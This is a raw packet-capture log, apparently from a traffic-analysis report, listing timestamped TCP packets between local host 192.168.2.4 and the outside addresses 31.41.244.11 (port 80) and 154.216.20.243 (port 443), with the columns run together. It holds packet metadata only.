                                                                                                                                                                                              Dec 16, 2024 01:01:45.664285898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.665270090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.665321112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.665414095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.665456057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.666424990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.666470051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.666546106 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.666593075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.667808056 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.667818069 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.667876959 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.668006897 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.668006897 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.668075085 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.668365955 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702114105 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702135086 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702301979 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702302933 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702368975 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.702442884 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723216057 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723234892 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723422050 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723422050 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723486900 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.723556995 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.760205984 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.760226011 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.760499001 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.760499954 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.760566950 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.761826992 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.777801991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.777848959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.777921915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.778338909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.778516054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.778579950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.779474020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.779603958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.779639959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.779686928 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.780683041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.780733109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.801600933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.801621914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.801681995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.801943064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.801969051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.802016020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.803000927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.803045988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.803092003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.804224968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.804243088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.804274082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.804306984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.805006027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.805052042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.805054903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.805102110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.806143045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.806211948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.806258917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.806377888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.807363987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.807416916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.807487011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.807655096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.808549881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.808738947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.808796883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.809756994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.810096025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.810158968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.810894966 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.810947895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.811186075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.811269045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.812068939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.812114000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.812166929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.812213898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.813266993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.813342094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.813397884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.813452959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.814460039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.814513922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.814568996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.814750910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.815638065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.815861940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.815918922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.816970110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.816987991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.817038059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.818016052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.818063974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.818162918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.818243027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.819179058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.819236994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.819289923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.819344044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.820404053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.820718050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.820770025 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.821815968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.821832895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.821897984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.822804928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.822853088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.822874069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.823098898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.823935986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.823986053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.824040890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.824100018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.825265884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.825284958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.825310946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.825342894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.826323986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.826381922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.826437950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.827562094 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.827722073 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.827778101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.828723907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.828852892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.828902960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.829884052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.829930067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.829986095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.830029011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.831068993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.831238031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.831291914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.831357002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.832576036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.832592964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.832653046 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.832653046 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.833794117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.833811045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.833873034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.834724903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.834743023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.834794998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.835805893 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.835855961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.836083889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.836132050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.837004900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.837081909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.837172031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.837249041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.838316917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.838334084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.838387966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.838387966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.839369059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.839453936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.839478016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.839535952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.840615988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.840632915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.840668917 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.840701103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.841917038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.841933012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.841985941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.842974901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.843039036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.843095064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.844227076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.844254017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.844281912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.844314098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.845324993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.845464945 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.845510960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.846563101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.846626043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.846671104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.847856998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.847873926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.847919941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.848934889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.848980904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.849153996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.850193024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.850244999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.850282907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.851330996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.851357937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.851377010 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.851434946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.852679968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.852696896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.852739096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.853646994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.853761911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.853816986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.854826927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.854870081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.854963064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.855986118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.856034040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.856126070 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.857232094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.857309103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.857445955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.857492924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.858508110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.858525991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.858562946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.859668970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.859708071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.904465914 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.904495955 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.904812098 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.904813051 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.904877901 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.905505896 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.921140909 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.921160936 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.921232939 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.921233892 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.921298027 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.923774004 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.938079119 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.938098907 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.938266993 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.938337088 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.938380003 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.941663027 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.952452898 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.952472925 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.952630997 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.952630997 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.952696085 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.953470945 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969321966 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969341993 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969528913 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969530106 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969594002 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.969882965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970056057 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970123053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970174074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970174074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970312119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970374107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.970419884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.971481085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.971539021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.971586943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.972702980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.972748041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.972780943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.973634958 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.986434937 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.986455917 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.986608028 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.986608982 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.986675024 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.989792109 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.993930101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.993947983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.993993998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.994427919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.994472027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.994527102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.995560884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.995604038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.996045113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.996706009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.996751070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.997180939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.997234106 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.997277021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.998404980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.998421907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.998459101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.999576092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.999618053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.999636889 CET804984831.41.244.11192.168.2.4
